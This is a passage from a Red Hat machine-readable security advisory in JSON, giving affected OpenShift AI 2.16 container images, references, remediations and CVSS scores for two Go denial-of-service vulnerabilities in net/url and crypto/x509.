"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
